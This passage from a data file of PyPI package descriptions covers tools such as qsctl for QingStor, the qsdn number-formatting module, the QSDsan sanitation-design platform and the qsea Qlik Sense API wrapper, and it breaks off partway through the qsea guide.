cloudshell.usage:\nUsage: csupload update [OPTIONS]Options:--nameTEXTcustom name for the script (optional)--typeTEXTscript or driver are supported--helpShow this message and exit.it uses credentials from shellfoundry , it can be viewed by typing \u201ccsupload config\u201d"} +{"package": "qsct", "pacakge-description": "QSCT - (Qodex Software Communication Tools) - \u044d\u0442\u043e \u043a\u043b\u0430\u0441\u0441, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u0439 \u0438\u0437 \u0441\u0435\u0431\u044f \u043d\u0430\u0431\u043e\u0440 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0434\u043b\u044f\n\u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f API \u0438 SDK. 
\u042f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0441\u0443\u043f\u0435\u0440-\u043a\u043b\u0430\u0441\u0441\u043e\u043c \u0434\u043b\u044f \u0441\u0443\u0431-\u043a\u043b\u0430\u0441\u0441\u043e\u0432:\n1) QPI (Qodex Programming Interface) - API \u0434\u043b\u044f \u041f\u041e \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0438 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Qodex,\n2) QDK (Qodex Development Kit) - SDK \u0434\u043b\u044f \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 API \u041f\u041e Qodex.\nQSCT \u043e\u043f\u0440\u0435\u0434\u043b\u0435\u044f\u0435\u0442 \u043c\u0435\u0442\u043e\u0434\u044b \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0438 \u0438 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u044b\u0445, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043f\u0440\u043e\u0447\u0435\u0433\u043e \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u043c\u0435\u0436\u0434\u0443 \u044d\u0442\u0438\u043c\u0438 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0438.v. 0.02\n\u0414\u043e\u0431\u0430\u0432\u043b\u0435\u043d \u043c\u0435\u0442\u043e\u0434 \u0434\u043b\u044f \u0445\u0435\u0448\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u0430\u0440\u043e\u043b\u044f \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0430\u043b\u043e\u0433\u0440\u0438\u0442\u043c\u0430 SHA-512"} +{"package": "qsct-hs", "pacakge-description": "QSCT - (Qodex Software Communication Tools) - \u044d\u0442\u043e \u043a\u043b\u0430\u0441\u0441, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u0439 \u0438\u0437 \u0441\u0435\u0431\u044f \u043d\u0430\u0431\u043e\u0440 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0434\u043b\u044f\n\u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f API \u0438 SDK. \u042f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0441\u0443\u043f\u0435\u0440-\u043a\u043b\u0430\u0441\u0441\u043e\u043c \u0434\u043b\u044f \u0441\u0443\u0431-\u043a\u043b\u0430\u0441\u0441\u043e\u0432:\n1) QPI (Qodex Programming Interface) - API \u0434\u043b\u044f \u041f\u041e \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0438 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Qodex,\n2) QDK (Qodex Development Kit) - SDK \u0434\u043b\u044f \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 API \u041f\u041e Qodex.\nQSCT \u043e\u043f\u0440\u0435\u0434\u043b\u0435\u044f\u0435\u0442 \u043c\u0435\u0442\u043e\u0434\u044b \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0438 \u0438 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u044b\u0445, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043f\u0440\u043e\u0447\u0435\u0433\u043e \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u043c\u0435\u0436\u0434\u0443 \u044d\u0442\u0438\u043c\u0438 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0438.v. 
0.02\n\u0414\u043e\u0431\u0430\u0432\u043b\u0435\u043d \u043c\u0435\u0442\u043e\u0434 \u0434\u043b\u044f \u0445\u0435\u0448\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u0430\u0440\u043e\u043b\u044f \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0430\u043b\u043e\u0433\u0440\u0438\u0442\u043c\u0430 SHA-512"} +{"package": "qsctl", "pacakge-description": "qsctl is intended to be an advanced command line tool for QingStor, it provides\npowerful unix-like commands to let you manage QingStor resources just like files\non local machine. Unix-like commands contains: cp, ls, mb, mv, rm, rb, and sync.\nAll of them support batch processing.Installationvirtualenv:$ pip install qsctlSystem-Wide:$ sudo pip install qsctlOn Windows systems, run it in a command-prompt window with administrator\nprivileges, and leave out sudo.Getting StartedTo use qsctl, there must be a configuration file , for example:access_key_id: 'ACCESS_KEY_ID_EXAMPLE'\nsecret_access_key: 'SECRET_ACCESS_KEY_EXAMPLE'The configuration file is~/.qingstor/config.yamlby default, it also\ncan be specified by the option-c/path/to/config.You can also config other option likehost,portand so on, just\nadd lines below into configuration file, for example:host: 'qingstor.com'\nport: 443\nprotocol: 'https'\nconnection_retries: 3\n# Valid levels are 'debug', 'info', 'warn', 'error', and 'fatal'.\nlog_level: 'debug'Available CommandsCommands supported by qsctl are listed below:lsList QingStor keys under a prefix or all QingStor buckets.cpCopy local file(s) to QingStor or QingStor key(s) to local.mbCreate a QingStor bucket.rbDelete an empty QingStor bucket or forcibly delete nonempty QingStor bucket.mvMove local file(s) to QingStor or QingStor key(s) to local.rmDelete a QingStor key or keys under a prefix.syncSync between local directory and QingStor prefix.presignGenerate a pre-signed URL for an object.ExamplesList keys in bucket by running:$ qsctl ls qs://mybucket\nDirectory test/\n2016-04-03 11:16:04 4 Bytes test1.txt\n2016-04-03 11:16:04 4 Bytes test2.txtSync from QingStor prefix to local directory:$ qsctl sync qs://mybucket3/test/ test/\nFile 'test/README.md' written\nFile 'test/commands.py' writtenSee the detailed usage and more examples with \u2018qsctl help\u2019 or \u2018qsctl help\u2019."} +{"package": "qsd", "pacakge-description": "No description available on PyPI."} +{"package": "qsde", "pacakge-description": "No description available on PyPI."} +{"package": "qs-distributions", "pacakge-description": "No description available on PyPI."} +{"package": "q-sdk", "pacakge-description": "Reference implementation of the API of QQ"} +{"package": "qsdn", "pacakge-description": "Welcome to Standard Decimal Notation's documentation!*****************************************************Contents:... module:: qsdnplatform:Unix, Windowssynopsis:This module allows for parsing, validation and production ofnumeric literals, written with thousand separators through outthe number. Often underlying system libraries for working withlocales neglect to put thousand separators (commas) after thedecimal place or they sometimes use scientific notation. Theclasses inherit from the Qt classes for making things lesscomplex.Thousand separators in general will not always be commas butinstead will be different according to the locale settings. InWindows for example, the user can set his thousand separator to anycharacter. 
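Before the class-by-class reference that follows, here is a compact, hedged sketch assembling the qsdn.Locale calls documented in the rest of this entry; it assumes PyQt5 and the qsdn module are installed, and the locale name and numeric values are arbitrary examples.
from decimal import Decimal
import qsdn

# Two mandatory and three maximum decimal places, as in the entry's own example.
locale = qsdn.Locale("en_US", 2, 3)

# toString always produces standard decimal notation with group separators.
print(locale.toString(Decimal("1234567.8")))

# toDecimal returns an ordered pair: the Decimal and a success flag that should be checked first.
d, ok = locale.toDecimal("1,234,567.80")
if ok:
    print(d + Decimal("0.20"))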
Support for converting strings directly to Decimals andfrom Decimals to strings is included.Also, numbers are always expressed in standard decimal notation.Care has been taken to overload all of the members in a way that isconsistent with the base class QLocale and QValidator.This module requires PyQt5. It is presently only tested withMicrosoft Windows. Users from other platforms are invited to joinmy team and submit pull-requests to ensure correct functioning. IfKDE and PyKDE are installed on your system, KDE's settings forthousands separator and decimal symbol will be used. Otherwise thesystem's locale settings will be used to determine these values.class qsdn.Locale(_name=None, p_mandatory_decimals=Decimal('0'), p_maximum_decimals=Decimal('Infinity'))For a Locale, locale:Main benefit is numbers converted to a string are alwaysconverted to standard decimal notation. And you control howfar numbers are written before they are truncated. Anotherbenefit is it works with decimal.Decimal numbers natively.So numbers get converted directly from String to Decimal andvice versa.To construct one, you can supply a name of a locale and specifythe mandatory and maximum digits after the decimal point.locale = Locale(\"en_US\", 2, 3) locale.toString(4) is '4.00'locale.toString(4.01) is '4.01' locale.toString(1/3) is '0.333'To specify the language and script, pass in a QLocale to theconstructor: like this: qlocale = QLocale('en_US',QLocale.Latin, QLocale.Spanish) sdnlocale = Locale(qlocale, 2,3)To get the Decimal of a string, s, use:(d, ok) = locale.toDecimal(s, 10)The value d is your decimal, and you should check ok beforeyou trust d.To get the string representation use:s = locale.toString(d)All to* routines take a string, and an optional base. If thebase is set to zero, it will look at the first digits of thenumber to determine base it should use. So, '013' will beinterpreted as 11 (as 0 indicates octal form) unless you set thebase to 10, in which as it will be interpreted as 13. You canuse '0x' to prefix hexadecimal numbers. Some developers don'twant to expose this programming concept to the users of thiersoftware. For those who don't specify the base explicitly as10. As of 1.0.0, the base defaults to 10, because the newbehavior as of PyQt5 in the QLocale class is to always have thebase fixed as 10.By default Locale will use the settings specified in yourdefault locale. This is guaranteed to be true for Mac OS,Windows and KDE-GUIs.static c()Returns the C locale. In the C locale, to* routines will notaccept group separtors and do not produce them.static setDefault(QLocale)static system()Returns the system default for Locale.toDecimal(s, *, base=10)This creates a decimal representation of s.It returns an ordered pair. The first of the pair is theDecimal number, the second of the pair indicates whetherthe string had a valid representation of that number. Youshould always check the second of the ordered pair beforeusing the decimal returned.It returns an ordered pair. The first of the pair is thenumber, the second of the pair indicates whether the stringhad a valid representation of that number. You should alwayscheck the second of the ordered pair before using the numberreturned.note:You may set another parameter, the base, so you caninterpret the string as 8 for octal, 16 for hex, 2 forbinary.If base is set to 0, numbers such as '0777' will beinterpreted as octal. 
The string '0x33' will be interpretedas hexadecimal and '777' will be interpreted as a decimal.Like the other to* functions of QLocale as well as this classLocale, interpret aa string and parse it and return a Decimal. The base valueis used to determine what base to use. It is done this way sothis works like toLong, toInt, toFloat, etc... Leading andtrailing whitespace is ignored.toDouble(s, *, base=10)Parses the string s and returns a floating point value whosestring is s.It returns an ordered pair. The first of the pair is thenumber, the second of the pair indicates whether the string hada valid representation of that number. You should always checkthe second of the ordered pair before using the number returned.note:You may set another parameter, the base, so you caninterpret the string as 8 for octal, 16 for hex, 2 forbinary.If base is set to 0, numbers such as '0777' will be interpretedas octal. The string '0x33' will be interpreted as hexadecimaland '777' will be interpreted as a decimal.It returns an ordered pair. The first of the pair is thenumber, the second of the pair indicates whether the stringhad a valid representation of that number. You should alwayscheck the second of the ordered pair before using the numberreturned.toFloat(s, *, base=10)Parses the string s and returns a floating point value whosestring is s.It returns an ordered pair. The first of the pair is thenumber, the second of the pair indicates whether the string hada valid representation of that number. You should always checkthe second of the ordered pair before using the number returned.note:You may set another parameter, the base, so you caninterpret the string as 8 for octal, 16 for hex, 2 forbinary.If base is set to 0, numbers such as '0777' will be interpretedas octal. The string '0x33' will be interpreted as hexadecimaland '777' will be interpreted as a decimal.toInt(s, *, base=10)Parses the string s and returns an integer value whose string iss.It returns an ordered pair. The first of the pair is thenumber, the second of the pair indicates whether the string hada valid representation of that number. You should always checkthe second of the ordered pair before using the number returned.note:You may set another parameter, the base, so you caninterpret the string as 8 for octal, 16 for hex, 2 forbinary.If base is set to 0, numbers such as '0777' will be interpretedas octal. The string '0x33' will be interpreted as hexadecimaland '777' will be interpreted as a decimal.toLongLong(s, *, base=10)Parses the string s and returns a floating point value whosestring is s.It returns an ordered pair. The first of the pair is thenumber, the second of the pair indicates whether the string hada valid representation of that number. You should always checkthe second of the ordered pair before using the number returned.note:You may set another parameter, the base, so you caninterpret the string as 8 for octal, 16 for hex, 2 forbinary.If base is set to 0, numbers such as '0777' will be interpretedas octal. The string '0x33' will be interpreted as hexadecimaland '777' will be interpreted as a decimal.Leading and trailing whitespace is ignored.toShort(s, *, base=10)Parses the string s and returns a short value whose string is s.It returns an ordered pair. The first of the pair is thenumber, the second of the pair indicates whether the string hada valid representation of that number. 
You should always check the second of the ordered pair before using the number returned. note: You may set another parameter, the base, so you can interpret the string as 8 for octal, 16 for hex, 2 for binary. If base is set to 0, numbers such as '0777' will be interpreted as octal. The string '0x33' will be interpreted as hexadecimal and '777' will be interpreted as a decimal. Leading and trailing whitespace is ignored. toShort(s, *, base=10) Parses the string s and returns a short value whose string is s. It returns an ordered pair. The first of the pair is the number, the second of the pair indicates whether the string had a valid representation of that number. You should always check the second of the ordered pair before using the number returned. note: You may set another parameter, the base, so you can interpret the string as 8 for octal, 16 for hex, 2 for binary. If base is set to 0, numbers such as '0777' will be interpreted as octal. The string '0x33' will be interpreted as hexadecimal and '777' will be interpreted as a decimal. Leading and trailing whitespace is ignored. toString(x, arg2=None, arg3=None) Convert any given Decimal, double, Date, Time, int or long to a string. Numbers are always converted to standard decimal notation. That is to say, numbers are never converted to scientific notation. The way toString is controlled: if passing a decimal.Decimal-typed value, the precision is recorded in the number itself. So, D('4.00') will be expressed as '4.00' and not '4'. D('4') will be expressed as '4'. When a number passed is NOT a Decimal, numbers are created in the following way: two extra parameters, set during creation of the locale, determine how many digits will appear in the result of toString(). For example, if we have a number like 5.1 and mandatory decimals is set to 2, toString(5.1) should return '5.10'. A number like 6 would be '6.00'. A number like 5.104 would depend on the maximum decimals setting, also set at construction of the locale: _maximum_decimals controls the maximum number of decimals after the decimal point. So, if _maximum_decimals is 6 and _mandatory_decimals is 2, then toString(3.1415929) is '3.141,592'. Notice the number is truncated and not rounded. Consider rounding a copy of the number before displaying. toUInt(s, *, base=10) Parses the string s and returns an unsigned integer value whose string is s. It returns an ordered pair. The first of the pair is the number, the second of the pair indicates whether the string had a valid representation of that number. You should always check the second of the ordered pair before using the number returned. note: You may set another parameter, the base (which defaults to 10), so you can interpret the string as 8 for octal, 16 for hex, 2 for binary. If base is set to 0, numbers such as '0777' will be interpreted as octal.
The string '0x33' will be interpreted as hexadecimaland '777' will be interpreted as a decimal.Leading and trailing whitespace is ignored.class qsdn.NumericValidator(parent=None)NumericValidator allows for numbers of any length butgroupSeparators are added or corrected when missing or out ofplace.U.S. dollar amounts;dollar = NumericValidator(6,2) s = '42.1'dollar.validate(s='42.1', 2) => s = '42.10' s='50000'dollar.toString(s) => s = ' 50,000.00'locale()get the locale used by this validatorsetLocale(plocale)Set the locale used by this Validator.validate(self, str, int) -> Tuple[QValidator.State, str, int]class qsdn.LimitingNumericValidator(maximum_decamals=1000, maximum_decimals=1000, use_space=False, parent=None)NumericValidator limits the number of digits after the decimalpoint and the number of digits before.bitcoin :NumericValidator(8, 8) US dollars less than $1,000,000 :NumericValidator(6, 2)If use space is true, spaces are added on the left such that thelocation of decimal point remains constant. Numbers like'10,000.004', '102.126' become aligned. Bitcoin amounts:' 0.004,3' ' 10.4' ' 320.0' '0.000,004'U.S. dollar amounts;dollar = NumericValidator(6,2) s = '42.1'dollar.validate(s='42.1', 2) => s = ' 42.10's='50000' dollar.toString(s) => s = '50,000.00'decamals()gets the number of decimal digits that are allowed **before**the decimal point (apart from spaces)decimals()gets the number of decimal digits that are allowed *after* thedecimal pointlocale()get the locale used by this validatorsetDecamals(i)sets the number of decimal digits that should be allowed**before** the decimal pointsetDecimals(i)sets the number of decimal digits that should be allowed**after** the decimal pointsetLocale(plocale)Set the locale used by this Validator.validate(s, pos)Validates s, by adjusting the position of the commas to be inthe correct places and adjusting pos accordingly as well asspace in order to keep decimal points aligned when varying sizednumbers are put one above the other.Indices and tables******************* Index* Module Index* Search Page"} +{"package": "qsdsan", "pacakge-description": "ContentsWhat isQSDsan?InstallationDocumentationAbout the AuthorsContributingStay ConnectedQSDsan EventsLicense InformationReferencesWhat isQSDsan?QSDsanis an open-source, community-led platform for the quantitative sustainable design (QSD) of sanitation and resource recovery systems[1]. It is one of a series of platforms that are being developed for the execution of QSD - a methodology for the research, design, and deployment of technologies and inform decision-making[2]. 
It leverages the structure and modules developed in theBioSTEAMplatform[3]with additional functions tailored to sanitation processes.As an open-source and impact-driven platform, QSDsan aims to identify configuration combinations, systematically probe interdependencies across technologies, and identify key sensitivities to contextual assumptions through the use of quantitative sustainable design methods (techno-economic analysis and life cycle assessment and under uncertainty).All systems developed withQSDsanare included in the packageEXPOsan- exposition of sanitation and resource recovery systems.Additionally, another package,DMsan(decision-making for sanitation and resource recovery systems), is being developed for decision-making among multiple dimensions of sustainability with consideration of location-specific contextual parameters.InstallationThe easiest way is throughpip, in command-line interface (e.g., Anaconda prompt, terminal):pip install qsdsanIf you need to upgrade:pip install -U qsdsanor for a specific version (replace X.X.X with the version number):pip install qsdsan==X.X.XIf you want to install the latest GitHub version at themain branch(note that you can still use the-Uflag for upgrading):pip install git+https://github.com/QSD-Group/QSDsan.gitNoteIf this doesn\u2019t give you the newestqsdsan, trypip uninstall qsdsanfirst.Also, you may need to update someqsdsan\u2019s dependency package (e.g., \u2018biosteamandthermosteam) versions in order for the newqsdsanto run.or other fork and/or branch (replaceandwith the desired fork and branch names)pip install git+https://github.com//QSDsan.git@You can also download the package fromPyPI.Note that development of this package is currently under initial stage with limited backward compatibility, please feel free tosubmit an issuefor any questions regarding package upgrading.If you want to contribute toQSDsan, please follow the steps in theContributing Guidelinessection of the documentation to clone the repository. If you find yourself struggle with the installation of QSDsan/setting up the environment, this extended version ofinstallation instructionsmight be helpful to you.DocumentationYou can find tutorials and documents at:https://qsdsan.readthedocs.ioAll tutorials are written using Jupyter Notebook, you can run your own Jupyter environment, or you can click thelaunch binderbadge on the top to launch the environment in your browser.For each of these tutorials, we are also recording videos where one of the QSD group members will go through the tutorial step-by-step. We are gradually releasing these videos on ourYouTube channelso subscribe to receive updates!About the AuthorsPlease refer toContributorssection for a list of contributors.ContributingPlease refer to theContributing Guidelinessection of the documentation for instructions and guidelines.Stay ConnectedIf you would like to receive news related to the QSDsan platform, you can subscribe to email updates usingthis form(don\u2019t worry, you will be able to unsubscribe :)). 
Thank you in advance for your interest!QSDsan EventsWe will keep thiscalendarup-to-date as we organize more events (office hours, workshops, etc.), click on the events in the calendar to see the details (including meeting links).License InformationPlease refer to theLICENSE.txtfor information on the terms & conditions for usage of this software, and a DISCLAIMER OF ALL WARRANTIES.References[1]Li, Y.; Zhang, X.; Morgan, V.L.; Lohman, H.A.C.; Rowles, L.S.; Mittal, S.; Kogler, A.; Cusick, R.D.; Tarpeh, W.A.; Guest, J.S. QSDsan: An integrated platform for quantitative sustainable design of sanitation and resource recovery systems. Environ. Sci.: Water Res. Technol. 2022, 8 (10), 2289-2303.https://doi.org/10.1039/d2ew00455k.[2]Li, Y.; Trimmer, J.T.; Hand, S.; Zhang, X.; Chambers, K.G.; Lohman, H.A.C.; Shi, R.; Byrne, D.M.; Cook, S.M.; Guest, J.S. Quantitative Sustainable Design (QSD): A Methodology for the Prioritization of Research, Development, and Deployment of Technologies. (Tutorial Review) Environ. Sci.: Water Res. Technol. 2022, 8 (11), 2439\u20132465.https://doi.org/10.1039/D2EW00431C.[3]Cort\u00e9s-Pe\u00f1a, Y.; Kumar, D.; Singh, V.; Guest, J.S. BioSTEAM: A Fast and Flexible Platform for the Design, Simulation, and Techno-Economic Analysis of Biorefineries under Uncertainty. ACS Sustainable Chem. Eng. 2020, 8 (8), 3302\u20133310.https://doi.org/10.1021/acssuschemeng.9b07040."} +{"package": "qsea", "pacakge-description": "TitleQSEA refers to the Qlik Sense Engine API.DescriptionQSEA is designed to automate basic operations with Qlik Sense Enterprise apps in a Pythonic way. With QSEA, you can quickly view and edit variables, master measures, and dimensions, as well as main sheet objects. For example, you can replace variables in all master measures of your app with just one line of code.formsinApp.measures:ms.update(definition=replace(ms.definition,'$(var1)','$(var2)'))or quickly move all measures from one app to another:formsinApp1.measures:App2.measures.add(name=ms.name,definition=ms.definition)InstallationpipinstallqseaTable of ContentsGetting startedFull GuideApp classApp.load()App.save()App.reload_data()App.childrenAppChildren classAppChildren addVariable classVariable propertiesVariable.update()Variable.delete()Variable.rename()Variable.get_layout()Measure classMeasure propertiesMeasure.update()Measure.delete()Measure.rename()Measure.get_layout()Dimension classDimension propertiesDimension.update()Dimension.delete()Dimension.rename()Dimension.get_layout()Sheet classSheet propertiesSheet.load()Sheet.get_layout()Field classField propertiesObject classObject propertiesObject.export_data()Object.load()Object.get_layout()ObjectChildren classObjectMeasure classObjectMeasure propertiesObjectMeasure.update()ObjectMeasure.delete()ObjectDImension classObjectDimension propertiesObjectDimension.update()ObjectDimension.delete()LicenseGetting startedQSEA uses the Qlik Sense Engine API via the Qlik Sense Proxy Service as its main tool, so you'll need the correct API credentials to start working with QSEA. 
Please refer to the following links for help.https://help.qlik.com/en-US/sense-developer/May2023/Subsystems/EngineAPI/Content/Sense_EngineAPI/GettingStarted/connecting-to-engine-api.htmhttps://help.qlik.com/en-US/cloud-services/Subsystems/Hub/Content/Sense_Hub/Admin/mc-generate-api-keys.htmYour credentials should look something like thisheader_user={'Authorization':'Bearer '}qlik_url=\"wss://server.domain.com[/virtual proxy]/app/\"Now we can connect to the Qlik Server:conn=qsea.Connection(header_user,qlik_url)Let's create an App object, which represents the application in Qlik Sense.app=qsea.App(conn,'MyAppName')By default the App class object is almost empty. Use theload()function to make use of it:app.load()Now all variables, master measures, and dimensions are uploaded to our App object. We can access them by their name:var=app.variables['MyVar']var.definitionms=app.measures['MyMeasure']ms.label_expressionOr, we can overview their properties via a pandas DataFrame.app.dimensions.dfLet's create a new measure:app.measures.add(name='MyMeasure',definition='sum(Sales)')or update a variable:var.update(definition='sum(Sales)')Save the app to ensure that the changes are reflected in the real Qlik Sense application.app.save()Let's copy the set of master dimensions into a new app:source_app=qsea.App(conn,'Source AppName')target_app=qsea.App(conn,'Target AppName')source_app.load()target_app.load()fordiminsource_app.dimensions:ifdim.namenotin[target_dim.namefortarget_dimintarget_app.dimensions]:target_app.dimensions.add(name=dim.name,definition=dim.definition)target_app.save()For unknown reasons, on certain instances of Qlik Sense, changes in the App may not be visible in the Qlik Sense interface. The usual workaround is to make a new copy of the Application (via QMC or Hub). Usually, all changes can be seen in the copy.Note that as it stands, only basic properties, such as names, definitions, and a couple of others, can be accessed via the qsea module.Most read-only operations (such as loading apps) can be performed on published apps. However, it is recommended to modify objects only in unpublished apps.Besides master measures, master dimensions, and variables, tables and charts in the App can also be uploaded.It's highly recommended to make a backup copy of your application.app.load()sh=app.sheets['MySheet']sh.load()forobjinsh.objects:formsonobj.measures:print(ms.definition)Good luck!Full GuideConnection classThe class that represents a dictionary of websocket connections to Qlik Sense Engine API\nSince one websocket connection can be used only for one app, this class is used to handle all websocket connections\nNew websocket connections are created automatically when a new app object is createdNote that the Qlik Sense Engine API has a limit of active parallel connections. Since there is no way to terminate the existing connection (except restarting the proxy server that is generally unacceptable), one have to wait for the Qlik Sense Engine to terminate some of the old sessions.\nThere is no way to reconnect to an existing connection if the Connection class object is recreated. Thus, it is highly recommended to avoid recreating the Connection class object in order to avoid reaching the limit of active connections.App classThe class, representing the Qlik Sense application. This is the main object to work with. 
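Pulling the pieces above together before the class-by-class reference continues, here is a hedged sketch that exports every object on one sheet, using only calls documented in this entry (Connection, App, load, sheets, objects, export_data); 'MyAppName' and 'MySheet' are placeholder names, the credentials are placeholders in the shape shown in the Getting started section, and the level keyword follows the entry's own App.load(level=3) example.
import qsea

header_user = {'Authorization': 'Bearer <API key>'}   # placeholder credentials
qlik_url = 'wss://server.domain.com/app/'             # placeholder Engine API URL

conn = qsea.Connection(header_user, qlik_url)
app = qsea.App(conn, 'MyAppName')
app.load(level=2)                                     # level 2 also loads sheet objects

sheet = app.sheets['MySheet']
sheet.load()
for obj in sheet.objects:
    # export_data returns the path of the downloaded file, or None on failure
    path = obj.export_data(file_type='xlsx')
    print(obj.type, path)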
The class is empty when created; run theload()function to make use of it.App.load()Loads data from the Qlik Sense application into an App object.Args:depth (int): depth of loading1 - app + variables, measures, sheets, fields, dimensions (default value)2 - everything from 1 + sheet objects (tables, sharts etc.)3 - everything from 2 + object dimensions and measuresDifferent levels can be useful when working with large apps, as a full load can be time-consuming. Only dimensions and measures from standard Qlik Sense charts are uploaded. Uploading dimensions from filter panes is currently not supported.App.load(level=3)App.save()You have to save the App object for the changes to be reflected in the Qlik Sense Application. Note that it is recommended to modify objects only in unpublished apps.App.save()App.reload_data()Starts the script of reloading data into the Qlik Sense Application.App.reload_data()App.childrenapp.load(level = 1) creates several objects of AppChildren classAppChildren classThe class contains collections of master objects in the Qlik Sense Application:app.variables: a collection of Variable class objects, representing the variables of the Qlik Sense applicationapp.measures: a collection of Measure class objects, representing the master measures of the Qlik Sense applicationapp.dimensions: a collection of Dimension class objects, representing the master dimensions of the Qlik Sense applicationapp.sheets: a collection of Sheet class objects, representing the sheets of the Qlik Sense applicationapp.fields: a collection of Field class objects, representing the fields of the Qlik Sense applicationYou can access the main information about each group of objects in a pandas DataFrame via the.dfattribute:app.variables.dfAppChildren.add()Use theadd()function to add new variables, master measures or master dimensions to the app.Args:name (str): Name of the object to be created.definition (str): Definition of the object to be created.description (str, optional): Description of the object to be created. Defaults to ''.label (str, optional): Label of the object to be created. Defaults to ''.label_expression (str, optional): Label expression of the object to be created. Defaults to ''.format_type (str, optional): Format type of the object to be created. Defaults to 'U'.'U' for auto'F' for number'M' for money'D' for date'IV' for duration'R' for otherformat_ndec (int, optional): Number of decimals of the object to be created. Defaults to 10.format_use_thou (int, optional): Use thousands separator for the object to be created. Defaults to 0.format_dec (str, optional): Decimal separator for the object to be created. Defaults to ','.format_thou (str, optional): Thousands separator for the object to be created. Defaults to ''.Returns: True if the object was created successfully, False otherwise.\nOnly parameters applicable to the specific class will be usedApp.variables.add(name='MyVar',definition='sum(Sales)')App.measures.add(name='MyFunc',definition='sum(Sales)',format_type='F')App.dimensions.add(name='MyDim',definition='Customer')Variable classThe class represents variables of the application and is a member of the App.variables collection. 
You can access a specific variable by its name or iterate through them:var=app.variables['MyVar']print(var.definition)forvarinapp.variables:ifvar.definition=='sum(Sales)':var.update(name='varSales')Variable propertiesname: this is the name of the variable you generally use in the Qlik Sense interfacedefinition: the formula behind the variabledescription: the description of the variableauxiliaryhandle: the internal handle of the object in the Qlik Sense Engine API; can be used to access the variable via thequery()functionapp_handle: the handle of the parent App objectid: Qlik Sense internal id of the variableparent: App-children object; you can access the App class object like thisvar.parent.parentcreated_date: creation date of the variable, as stored in Qlik Sensemodified_date: date of the last modification of the variable, as stored in Qlik Sensescript_created: True if the variable is created via the application load script, False if not.Variable.update()Updates the variable on the Qlik Sense ServerArgs:definition (str, optional): new definition of the variable (leaveNoneto keep the old value)description (str, optional): new description of the variable (leaveNoneto keep the old value)Returns:\nTrue if the variable was updated successfully, False otherwisevar=app.variables['MyVar']var.update(definition='sum(Sales)')app.save()Variable.delete()Deletes the variable from the Qlik Sense ServerReturns:\nTrue if the variable was deleted successfully, False otherwisevar=app.variables['MyVar']var.delete()app.save()Variable.rename()Renames the variable on the Qlik Sense Server. Since there is no direct method to rename the variable, it essentially deletes the variable with the old name, and creates a new one, with the new name.Returns:\nTrue if the variable is renamed successfully, False otherwisevar=app.variables['MyVar']var.rename('MyVarNewName')app.save()Variable.get_layout()Returns the json layout of the variable; a shortcut to the GetLayout method of the Engine APIvar.get_layout()Measure classThe class represents master measures of the application and is a member of the App.measures collection. 
You can access a specific measure by its name or iterate through them.ms=app.measures['MyMeasure']print(ms.definition)formsinapp.measures:ifms.definition=='sum(Sales)':ms.update(name='Sales')Measure propertiesname: the name of the measure you generally use in the Qlik Sense interfacedefinition: the formula behind the measuredescription: the description of the measurelabel: the label of the measure, as it appears in chartslabel_expression: the label expression of the measureformat_type: Format type of the object'U' for auto'F' for number'M' for money'D' for date'IV' for duration'R' for otherformat_ndec: Number of decimals for the objectformat_use_thou: Use thousands separator for the objectformat_dec: Decimal separator for the objectformat_thou: Thousands separator for the objectauxiliaryhandle: the internal handle of the object in the Qlik Sense Engine API; can be used to access the measure via thequery()functionapp_handle: the handle of the parent App objectid: Qlik Sense internal id of the measureparent: AppChildren object; you can access the App class object like thisms.parent.parentcreated_date: creation date of the measure, as stored in Qlik Sensemodified_date: date of the last modification of the measure, as stored in Qlik SenseMeasure.update()Updates the measure on the Qlik Sense ServerArgs:definition (str, optional): The definition of the measuredescription (str, optional): the description of the measurelabel (str, optional): the label of the measure, as it appears in chartslabel_expression (str, optional): the label expression of the measureformat_type (str, optional): Format type of the object to be created. Defaults to 'U'.'U' for auto'F' for number'M' for money'D' for date'IV' for duration'R' for otherformat_ndec (int, optional): Number of decimals for the object to be created. Defaults to 10.format_use_thou (int, optional): Use thousands separator for the object to be created. Defaults to 0.format_dec (str, optional): Decimal separator for the object to be created. Defaults to ','.format_thou (str, optional): Thousands separator for the object to be created. Defaults to ''.Returns:\nTrue if the measure was updated successfully, False otherwisems=app.measures['MyMeasure']ms.update(definition='sum(Sales)',label='Total Sales',format_type='F')app.save()Measure.delete()Deletes the measure from the Qlik Sense ServerReturns:\nTrue if the measure was deleted successfully, False 